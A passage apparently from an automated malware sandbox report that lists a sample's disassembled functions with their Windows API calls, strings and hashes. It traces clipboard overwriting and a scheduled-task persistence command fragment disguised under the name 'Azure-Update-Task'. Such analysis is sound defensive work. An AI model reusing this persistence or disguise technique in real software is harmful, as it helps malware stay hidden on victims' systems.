                                                                                                                                                                                          Function 02C61589, Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 82processmemorysynchronizationCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • memset.NTDLL ref: 02C6159F
                                                                                                                                                                                          • memset.NTDLL ref: 02C615AF
                                                                                                                                                                                          • LocalAlloc.KERNEL32(00000040,00000308), ref: 02C615BF
                                                                                                                                                                                            • Part of subcall function 02C61FCC: lstrlenW.KERNEL32(?,00000044,?,00000000,?,?,?,02C615D5), ref: 02C61FE2
                                                                                                                                                                                            • Part of subcall function 02C61FCC: lstrlenW.KERNEL32(/C /create /F /sc minute /mo 1 /tn ",00000044,?,00000000,?,?,?,02C615D5), ref: 02C61FEF
                                                                                                                                                                                            • Part of subcall function 02C61FCC: LocalAlloc.KERNEL32(00000040,00000001,?,02C615D5), ref: 02C62000
                                                                                                                                                                                            • Part of subcall function 02C61FCC: GlobalFree.KERNEL32(?), ref: 02C62021
                                                                                                                                                                                          • CreateProcessW.KERNEL32(004039E8,?,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 02C61621
                                                                                                                                                                                          • LocalFree.KERNEL32(?), ref: 02C61630
                                                                                                                                                                                          • WaitForSingleObject.KERNEL32(?,000000FF), ref: 02C6163F
                                                                                                                                                                                          • LocalFree.KERNEL32(?), ref: 02C6165A
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000E.00000002.609959614.0000000002C60000.00000040.00000001.sdmp, Offset: 02C60000, based on PE: false
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Local$Free$Alloclstrlenmemset$CreateGlobalObjectProcessSingleWait
                                                                                                                                                                                          • String ID: " /tr "$/C /create /F /sc minute /mo 1 /tn "$Azure-Update-Task$9@
                                                                                                                                                                                          • API String ID: 3199137260-561363415
                                                                                                                                                                                          • Opcode ID: 1ec7269c68737af2b38322868ed3762ec80b395895a701cf05524ec3fdf00e48
                                                                                                                                                                                          • Instruction ID: 02738a5c6a7977df94ccd5fe5479601067bb0b0f3358b419eaace194af235466
                                                                                                                                                                                          • Opcode Fuzzy Hash: 1ec7269c68737af2b38322868ed3762ec80b395895a701cf05524ec3fdf00e48
                                                                                                                                                                                          • Instruction Fuzzy Hash: 7221A4B5900109BFD710EFA4DD89EAF7F7DEB80756F240035B605B6294DBB09F009A69
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 02C61DC7, Relevance: 18.1, APIs: 12, Instructions: 119stringmemorysleepCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 02C61250: LoadLibraryW.KERNEL32(004036C8), ref: 02C6125B
                                                                                                                                                                                            • Part of subcall function 02C61250: LoadLibraryW.KERNEL32(0040370C), ref: 02C61291
                                                                                                                                                                                            • Part of subcall function 02C61250: LoadLibraryW.KERNEL32(00403720), ref: 02C6129F
                                                                                                                                                                                            • Part of subcall function 02C61250: LoadLibraryW.KERNEL32(00403738), ref: 02C612AC
                                                                                                                                                                                            • Part of subcall function 02C61250: LoadLibraryW.KERNEL32(0040374C), ref: 02C612B9
                                                                                                                                                                                            • Part of subcall function 02C61250: LoadLibraryW.KERNEL32(00403738), ref: 02C612C7
                                                                                                                                                                                            • Part of subcall function 02C61250: GetProcAddress.KERNEL32(?,00403788), ref: 02C612F2
                                                                                                                                                                                            • Part of subcall function 02C61250: GetProcAddress.KERNEL32(?,0040379C), ref: 02C61303
                                                                                                                                                                                            • Part of subcall function 02C61250: GetProcAddress.KERNEL32(?,004037A8), ref: 02C61314
                                                                                                                                                                                            • Part of subcall function 02C61250: GetProcAddress.KERNEL32(?,004037B4), ref: 02C61325
                                                                                                                                                                                            • Part of subcall function 02C61250: GetProcAddress.KERNEL32(?,004037C0), ref: 02C61336
                                                                                                                                                                                            • Part of subcall function 02C61250: GetProcAddress.KERNEL32(?,004037D0), ref: 02C61347
                                                                                                                                                                                            • Part of subcall function 02C61250: GetProcAddress.KERNEL32(?,004037DC), ref: 02C61358
                                                                                                                                                                                            • Part of subcall function 02C61250: GetProcAddress.KERNEL32(?,004037E8), ref: 02C61369
                                                                                                                                                                                            • Part of subcall function 02C61250: GetProcAddress.KERNEL32(?,004037F4), ref: 02C6137D
                                                                                                                                                                                            • Part of subcall function 02C61250: GetProcAddress.KERNEL32(?,004037FC), ref: 02C6138E
                                                                                                                                                                                            • Part of subcall function 02C61250: GetProcAddress.KERNEL32(?,00403804), ref: 02C6139F
                                                                                                                                                                                            • Part of subcall function 02C61250: GetProcAddress.KERNEL32(?,00403810), ref: 02C613AB
                                                                                                                                                                                            • Part of subcall function 02C61250: GetProcAddress.KERNEL32(?,0040381C), ref: 02C613B7
                                                                                                                                                                                            • Part of subcall function 02C61250: GetProcAddress.KERNEL32(00000000,00403830), ref: 02C613C8
                                                                                                                                                                                            • Part of subcall function 02C61250: GetProcAddress.KERNEL32(?,00403840), ref: 02C613D7
                                                                                                                                                                                          • CreateMutexW.KERNEL32(00000000,00000000,00403030), ref: 02C61DDE
                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 02C61DE4
                                                                                                                                                                                          • ExitProcess.KERNEL32 ref: 02C61DF3
                                                                                                                                                                                          • lstrlenW.KERNEL32(00000000), ref: 02C61E14
                                                                                                                                                                                          • LocalAlloc.KERNEL32(00000040,00000000), ref: 02C61E26
                                                                                                                                                                                          • LocalAlloc.KERNEL32(00000040,?,?), ref: 02C61E8A
                                                                                                                                                                                          • lstrlenW.KERNEL32(?,?), ref: 02C61EE9
                                                                                                                                                                                          • LocalFree.KERNEL32(?), ref: 02C61F04
                                                                                                                                                                                          • lstrlenW.KERNEL32(?,?), ref: 02C61F0D
                                                                                                                                                                                          • LocalFree.KERNEL32(?), ref: 02C61F20
                                                                                                                                                                                          • Sleep.KERNEL32(000000E1), ref: 02C61F2B
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000E.00000002.609959614.0000000002C60000.00000040.00000001.sdmp, Offset: 02C60000, based on PE: false
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: AddressProc$LibraryLoad$Local$lstrlen$AllocFree$CreateErrorExitLastMutexProcessSleep
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3526352376-0
                                                                                                                                                                                          • Opcode ID: 347b62e39c1b5feb9e8dd141994958ff6feaa20621b2d653af5b8c2ba136f58b
                                                                                                                                                                                          • Instruction ID: b16e5c85db634e8ba305d63882d9492b6c12e3d3e653d406712b48766dbd8b58
                                                                                                                                                                                          • Opcode Fuzzy Hash: 347b62e39c1b5feb9e8dd141994958ff6feaa20621b2d653af5b8c2ba136f58b
                                                                                                                                                                                          • Instruction Fuzzy Hash: 9C416F75900215ABCB219FE4C98C67EBAF5BF88307F180025E645F3360DBB4DA019B55
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 004199E0, Relevance: 16.6, APIs: 11, Instructions: 90memorypipeCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 00419A0C
                                                                                                                                                                                          • GetPrivateProfileIntW.KERNEL32(00421E80,00421E70,00000000,00421E30), ref: 00419A2C
                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 00419A32
                                                                                                                                                                                          • GetNumberFormatA.KERNEL32(00000000,00000000,00421E90,00000000,?,00000000), ref: 00419A58
                                                                                                                                                                                          • GetCPInfoExW.KERNEL32(00000000,00000000,?), ref: 00419A69
                                                                                                                                                                                          • GetCommandLineW.KERNEL32 ref: 00419A6F
                                                                                                                                                                                          • GetStartupInfoA.KERNEL32(00000000), ref: 00419A77
                                                                                                                                                                                          • SetFileShortNameA.KERNEL32(00000000,00000000), ref: 00419A81
                                                                                                                                                                                          • CreateNamedPipeA.KERNEL32(00421EB0,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00419AF1
                                                                                                                                                                                          • GetBinaryType.KERNEL32(00421ED0,?), ref: 00419B49
                                                                                                                                                                                          • HeapDestroy.KERNEL32(00000000), ref: 00419B51
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000E.00000002.609445668.0000000000406000.00000020.00020000.sdmp, Offset: 00406000, based on PE: false
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ErrorInfoLast$BinaryCommandCreateDestroyFileFormatHeapLineNameNamedNumberPipePrivateProfileShortStartupType
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3242046743-0
                                                                                                                                                                                          • Opcode ID: 7c5cb30a4695b971b029f1528554ae09b201add16f0ae535992b7a0b0ca3f754
                                                                                                                                                                                          • Instruction ID: 01657f5c00476ba7faca39b10de3ba90de21ef6b07a221bae3b0a22fecd08fed
                                                                                                                                                                                          • Opcode Fuzzy Hash: 7c5cb30a4695b971b029f1528554ae09b201add16f0ae535992b7a0b0ca3f754
                                                                                                                                                                                          • Instruction Fuzzy Hash: 3A31B070A44214DFE720DF90EC29BE97B71FB48349F1082AAF10566190CBB92D98DF1E
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00406001, Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 263COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000E.00000002.609445668.0000000000406000.00000020.00020000.sdmp, Offset: 00406000, based on PE: false
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: _write_multi_char$_write_string$__aulldiv__aullrem__mbtowc_l
                                                                                                                                                                                          • String ID: 9
                                                                                                                                                                                          • API String ID: 306235055-2366072709
                                                                                                                                                                                          • Opcode ID: 20bd4080c8e660b2b765e9eaec09d05692696ac55142104f97c21983c69165a8
                                                                                                                                                                                          • Instruction ID: 4d1ee3b5c3b669ca86b3b2560db9b9e2486537ce75942733b24cdf4f3669aa82
                                                                                                                                                                                          • Opcode Fuzzy Hash: 20bd4080c8e660b2b765e9eaec09d05692696ac55142104f97c21983c69165a8
                                                                                                                                                                                          • Instruction Fuzzy Hash: 6FC11AB1D002299FDB14CF98C881BAEB7B5FF84304F1541A9E60AB7281D7385E91CF59
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 004108D7, Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 241COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000E.00000002.609445668.0000000000406000.00000020.00020000.sdmp, Offset: 00406000, based on PE: false
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: _write_multi_char$__get_printf_count_output_get_int_arg_wctomb_s_write_string
                                                                                                                                                                                          • String ID: -
                                                                                                                                                                                          • API String ID: 532768033-2547889144
                                                                                                                                                                                          • Opcode ID: 85c6db6edcee3a764261b9dadb276df4ee325cc57f35f31d4818c573b552330a
                                                                                                                                                                                          • Instruction ID: 445fecfb2395e1bc81349e7a00bdb9547341c29de4ea7dfb4c7d74514e35de85
                                                                                                                                                                                          • Opcode Fuzzy Hash: 85c6db6edcee3a764261b9dadb276df4ee325cc57f35f31d4818c573b552330a
                                                                                                                                                                                          • Instruction Fuzzy Hash: B7A180B0D052298BEF20DF54CC49BEEB7B1AB48304F1441DAE518BA291D7B99EC0CF59
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00410725, Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 225COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000E.00000002.609445668.0000000000406000.00000020.00020000.sdmp, Offset: 00406000, based on PE: false
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: _write_multi_char$_get_int_arg_strlen_wctomb_s_write_string
                                                                                                                                                                                          • String ID: -
                                                                                                                                                                                          • API String ID: 2232461714-2547889144
                                                                                                                                                                                          • Opcode ID: d0d823aee03a34b056043af3defca92891557a7d9fe23642221d1551105c16b1
                                                                                                                                                                                          • Instruction ID: 101e3251ec34b98fd8c90ff1df4b4bcaf2cc239290caa32785a8a7b5b6a31c4b
                                                                                                                                                                                          • Opcode Fuzzy Hash: d0d823aee03a34b056043af3defca92891557a7d9fe23642221d1551105c16b1
                                                                                                                                                                                          • Instruction Fuzzy Hash: EFA17A70D012288BDB64CF54CC89BEEB7B1BB48304F1481DAE519AB291D7B99EC0CF59
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 02C61D27, Relevance: 13.5, APIs: 9, Instructions: 36clipboardmemoryCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GlobalAlloc.KERNEL32(00000002,00000000,?,00000000,00000000,02C61F1D), ref: 02C61D36
                                                                                                                                                                                          • GlobalFix.KERNEL32(00000000), ref: 02C61D41
                                                                                                                                                                                          • memcpy.NTDLL(00000000), ref: 02C61D48
                                                                                                                                                                                          • GlobalUnWire.KERNEL32(00000000), ref: 02C61D52
                                                                                                                                                                                          • OpenClipboard.USER32(00000000), ref: 02C61D5A
                                                                                                                                                                                          • EmptyClipboard.USER32 ref: 02C61D64
                                                                                                                                                                                          • SetClipboardData.USER32(0000000D,00000000), ref: 02C61D6D
                                                                                                                                                                                          • CloseClipboard.USER32 ref: 02C61D73
                                                                                                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 02C61D7A
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000E.00000002.609959614.0000000002C60000.00000040.00000001.sdmp, Offset: 02C60000, based on PE: false
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ClipboardGlobal$AllocCloseDataEmptyFreeOpenWirememcpy
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2518647738-0
                                                                                                                                                                                          • Opcode ID: 6e8f05b13c52bda2192f9b5ea7998a520b2c1201303ff2b2893ffa802e95b434
                                                                                                                                                                                          • Instruction ID: 5db496f50071b2cf3005acbee94e554ebba1e03153c434a0a1f51f80c665fd9a
                                                                                                                                                                                          • Opcode Fuzzy Hash: 6e8f05b13c52bda2192f9b5ea7998a520b2c1201303ff2b2893ffa802e95b434
                                                                                                                                                                                          • Instruction Fuzzy Hash: 7CF0DAF6601110ABE2002BB5BE8DB6B3E6CEBC9757F050535B306F51A1CA7484048778
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00419B60, Relevance: 12.0, APIs: 8, Instructions: 38librarytimethreadCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • LoadLibraryA.KERNEL32(00421EEC), ref: 00419B70
                                                                                                                                                                                          • GetCurrentDirectoryW.KERNEL32(00000000,?), ref: 00419B7F
                                                                                                                                                                                          • SetSystemTime.KERNEL32(00000000), ref: 00419B87
                                                                                                                                                                                          • GetModuleFileNameW.KERNEL32(00000000,?,00000000), ref: 00419B98
                                                                                                                                                                                          • FreeLibraryAndExitThread.KERNEL32(00000000,00000000), ref: 00419BA2
                                                                                                                                                                                          • FindFirstChangeNotificationA.KERNEL32(00421EFC,00000000,00000000), ref: 00419BB1
                                                                                                                                                                                          • LCMapStringA.KERNEL32(00000000,00000000,00421F1C,00000000,?,00000000), ref: 00419BCB
                                                                                                                                                                                          • TlsGetValue.KERNEL32(00000000), ref: 00419BD3
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000E.00000002.609445668.0000000000406000.00000020.00020000.sdmp, Offset: 00406000, based on PE: false
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Library$ChangeCurrentDirectoryExitFileFindFirstFreeLoadModuleNameNotificationStringSystemThreadTimeValue
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1784048794-0
                                                                                                                                                                                          • Opcode ID: 0af3889749f43eeecc148a883a65a84b529d05b0c956aced57ee8f991bc1cdc1
                                                                                                                                                                                          • Instruction ID: e589456b1699ab58c567d739c912f2cf862097d719ddb17d9b21405fbe78bbf5
                                                                                                                                                                                          • Opcode Fuzzy Hash: 0af3889749f43eeecc148a883a65a84b529d05b0c956aced57ee8f991bc1cdc1
                                                                                                                                                                                          • Instruction Fuzzy Hash: 3601EC35394308AFE7509BE0AC0AFDA7B24EB0DB02F508055FB1DD90E0DBE41584CBAA
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00406F9A, Relevance: 10.7, APIs: 7, Instructions: 238COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000E.00000002.609445668.0000000000406000.00000020.00020000.sdmp, Offset: 00406000, based on PE: false
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: _write_multi_char$__get_printf_count_output__mbtowc_l_get_int_arg_write_string
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 4168457693-0
                                                                                                                                                                                          • Opcode ID: 44fcc49f60f58285e5f9283564e37d0e290b17b888b1392288584d7e114d89ad
                                                                                                                                                                                          • Instruction ID: 5783ae4fa3ace3306abf742abbb44e072aec33fa5154f1a097697c60da70c7f4
                                                                                                                                                                                          • Opcode Fuzzy Hash: 44fcc49f60f58285e5f9283564e37d0e290b17b888b1392288584d7e114d89ad
                                                                                                                                                                                          • Instruction Fuzzy Hash: A5A1A3F1D442199BDB24DF54CC85BAEB774AB44304F1080AAE609772C1D779AE84CF5E
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00406DC4, Relevance: 10.7, APIs: 7, Instructions: 222COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000E.00000002.609445668.0000000000406000.00000020.00020000.sdmp, Offset: 00406000, based on PE: false
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: _write_multi_char$__mbtowc_l_get_int_arg_strlen_write_string
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 909868375-0
                                                                                                                                                                                          • Opcode ID: 3be1e5502759e1e7b5207488dc20e90ab2552a12d282a777878a723582cdcecf
                                                                                                                                                                                          • Instruction ID: 76c5c194636e8b2f4865bd4f5cda7f9b0b6a08818c9518e3daf862c3a67a0ccb
                                                                                                                                                                                          • Opcode Fuzzy Hash: 3be1e5502759e1e7b5207488dc20e90ab2552a12d282a777878a723582cdcecf
                                                                                                                                                                                          • Instruction Fuzzy Hash: B7A170B1D042189FDB24CF54CC85BAEB7B5BB44305F1481AAE60A772C1E739AE84CF59
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00410BA1, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 104COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000E.00000002.609445668.0000000000406000.00000020.00020000.sdmp, Offset: 00406000, based on PE: false
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: __aulldiv__aullrem_get_int64_arg
                                                                                                                                                                                          • String ID: '$0$9
                                                                                                                                                                                          • API String ID: 3120068967-269856862
                                                                                                                                                                                          • Opcode ID: 116f8ebee97dc1323232d8d5e5f82bcaf57024a6c58e21d710bddbb84aa3cbba
                                                                                                                                                                                          • Instruction ID: 07d55785e54881d32caa72cedfa6fe5eea0ab8049c29c9414e6dfe1d52044e4f
                                                                                                                                                                                          • Opcode Fuzzy Hash: 116f8ebee97dc1323232d8d5e5f82bcaf57024a6c58e21d710bddbb84aa3cbba
                                                                                                                                                                                          • Instruction Fuzzy Hash: 9241D4B1D05228DFEB24CF98D889BEEB7B5BB44304F24859AD409A7241D778AEC1CF45
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 02C62147, Relevance: 9.1, APIs: 6, Instructions: 68stringCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • lstrlenW.KERNEL32(?,?,02C61A59), ref: 02C6214B
                                                                                                                                                                                          • lstrlenW.KERNEL32(?,?,?,02C61A59), ref: 02C62157
                                                                                                                                                                                          • StrChrW.SHLWAPI(?,00000030,?,?,02C61A59), ref: 02C621B6
                                                                                                                                                                                          • StrChrW.SHLWAPI(?,0000004F,?,00000030,?,?,02C61A59), ref: 02C621C3
                                                                                                                                                                                          • StrChrW.SHLWAPI(?,00000049,?,0000004F,?,00000030,?,?,02C61A59), ref: 02C621D0
                                                                                                                                                                                          • StrChrW.SHLWAPI(?,0000006C,?,00000049,?,0000004F,?,00000030,?,?,02C61A59), ref: 02C621DD
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000E.00000002.609959614.0000000002C60000.00000040.00000001.sdmp, Offset: 02C60000, based on PE: false
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: lstrlen
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1659193697-0
                                                                                                                                                                                          • Opcode ID: 34e5242f1b3c15c738e08e41ff9107dc44d7df7da787cb389f94cc33d272342b
                                                                                                                                                                                          • Instruction ID: f63b67586383a52337dc7283bea6f5ac8f640931f8808dd44832dce625e51994
                                                                                                                                                                                          • Opcode Fuzzy Hash: 34e5242f1b3c15c738e08e41ff9107dc44d7df7da787cb389f94cc33d272342b
                                                                                                                                                                                          • Instruction Fuzzy Hash: 1711406174916116DB342A286DDCF7E367C6BC25AAB1A4427FF86E40B0D714CFC3918B
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00410B8E, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 106COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000E.00000002.609445668.0000000000406000.00000020.00020000.sdmp, Offset: 00406000, based on PE: false
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: __aulldiv__aullrem_get_int64_arg
                                                                                                                                                                                          • String ID: 0$9
                                                                                                                                                                                          • API String ID: 3120068967-1975997740
                                                                                                                                                                                          • Opcode ID: 71b3785b80bd961fdd65258f3832804ca2939cb562fbb5e92e2a3f59183cd18f
                                                                                                                                                                                          • Instruction ID: e960a11e4ece91178d3a2e8896ec326cb66e4a59b306e649322599f7164a7816
                                                                                                                                                                                          • Opcode Fuzzy Hash: 71b3785b80bd961fdd65258f3832804ca2939cb562fbb5e92e2a3f59183cd18f
                                                                                                                                                                                          • Instruction Fuzzy Hash: DD41F5B1D05228DFDB24CF98D889BEEB7B5BB44304F20859AD009A7241D778AAC1CF45
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00407263, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 105COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000E.00000002.609445668.0000000000406000.00000020.00020000.sdmp, Offset: 00406000, based on PE: false
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: __aulldiv__aullrem_get_int64_arg
                                                                                                                                                                                          • String ID: '$9
                                                                                                                                                                                          • API String ID: 3120068967-1823400153
                                                                                                                                                                                          • Opcode ID: d3611736a4f00d3dc56c7b6daf18abb9b521060ec6e09dd6e3217bacfd76b68f
                                                                                                                                                                                          • Instruction ID: fdf06efbe065a151bc7ca3d8de09cf6a9abfcdffc1ecb06711ebebe3684aa0c5
                                                                                                                                                                                          • Opcode Fuzzy Hash: d3611736a4f00d3dc56c7b6daf18abb9b521060ec6e09dd6e3217bacfd76b68f
                                                                                                                                                                                          • Instruction Fuzzy Hash: 9F4108B1E045299FDB24CF58C941BAEB7B5FF85314F1080A9D648B7281D3786E81CF5A
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 02C62289, Relevance: 7.6, APIs: 5, Instructions: 87stringCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • lstrlenW.KERNEL32(?,?,?,02C61ABD), ref: 02C6229A
                                                                                                                                                                                          • StrChrW.SHLWAPI(?,00000030,?,?,?,02C61ABD), ref: 02C6232B
                                                                                                                                                                                          • StrChrW.SHLWAPI(?,0000004F,?,00000030,?,?,?,02C61ABD), ref: 02C62338
                                                                                                                                                                                          • StrChrW.SHLWAPI(?,00000049,?,0000004F,?,00000030,?,?,?,02C61ABD), ref: 02C62345
                                                                                                                                                                                          • StrChrW.SHLWAPI(?,0000006C,?,00000049,?,0000004F,?,00000030,?,?,?,02C61ABD), ref: 02C62352
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000E.00000002.609959614.0000000002C60000.00000040.00000001.sdmp, Offset: 02C60000, based on PE: false
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: lstrlen
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1659193697-0
                                                                                                                                                                                          • Opcode ID: 1dfb8a87e815566c9d5978d19a236094ff7e72a8b195f751a92239c3df4cb982
                                                                                                                                                                                          • Instruction ID: 8dabf1dfc9f8d5580f857da9f5b39cb1fc278058b27f69e8ef9bf25f7690aace
                                                                                                                                                                                          • Opcode Fuzzy Hash: 1dfb8a87e815566c9d5978d19a236094ff7e72a8b195f751a92239c3df4cb982
                                                                                                                                                                                          • Instruction Fuzzy Hash: 791107A194A152919B3E1A1D58CC63E2AFC5BCF9987AC0837EE2DE407DD314C3C25257
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 02C621EE, Relevance: 7.6, APIs: 5, Instructions: 64stringCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • lstrlenW.KERNEL32(?,?,02C61A8B), ref: 02C621F2
                                                                                                                                                                                          • StrChrW.SHLWAPI(?,00000030,?,?,02C61A8B), ref: 02C62251
                                                                                                                                                                                          • StrChrW.SHLWAPI(?,0000004F,?,00000030,?,?,02C61A8B), ref: 02C6225E
                                                                                                                                                                                          • StrChrW.SHLWAPI(?,00000049,?,0000004F,?,00000030,?,?,02C61A8B), ref: 02C6226B
                                                                                                                                                                                          • StrChrW.SHLWAPI(?,0000006C,?,00000049,?,0000004F,?,00000030,?,?,02C61A8B), ref: 02C62278
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000E.00000002.609959614.0000000002C60000.00000040.00000001.sdmp, Offset: 02C60000, based on PE: false
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: lstrlen
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1659193697-0
                                                                                                                                                                                          • Opcode ID: 328b822c4393c529a9a899670a59262547426000f33717c38db6df60201e6aa8
                                                                                                                                                                                          • Instruction ID: fea8747bd611898e270794846a42abec6af706c172346e5c980e488a7ffac52c
                                                                                                                                                                                          • Opcode Fuzzy Hash: 328b822c4393c529a9a899670a59262547426000f33717c38db6df60201e6aa8
                                                                                                                                                                                          • Instruction Fuzzy Hash: B00171E114016215DB742A2CACCCB7E23599FC7D78B1A4427FE46E60F0E318C7CA518B
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 02C61FCC, Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 51stringmemoryCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • lstrlenW.KERNEL32(?,00000044,?,00000000,?,?,?,02C615D5), ref: 02C61FE2
                                                                                                                                                                                          • lstrlenW.KERNEL32(/C /create /F /sc minute /mo 1 /tn ",00000044,?,00000000,?,?,?,02C615D5), ref: 02C61FEF
                                                                                                                                                                                          • LocalAlloc.KERNEL32(00000040,00000001,?,02C615D5), ref: 02C62000
                                                                                                                                                                                          • GlobalFree.KERNEL32(?), ref: 02C62021
                                                                                                                                                                                          Strings
                                                                                                                                                                                          • /C /create /F /sc minute /mo 1 /tn ", xrefs: 02C61FEE
                                                                                                                                                                                          Memory Dump Source
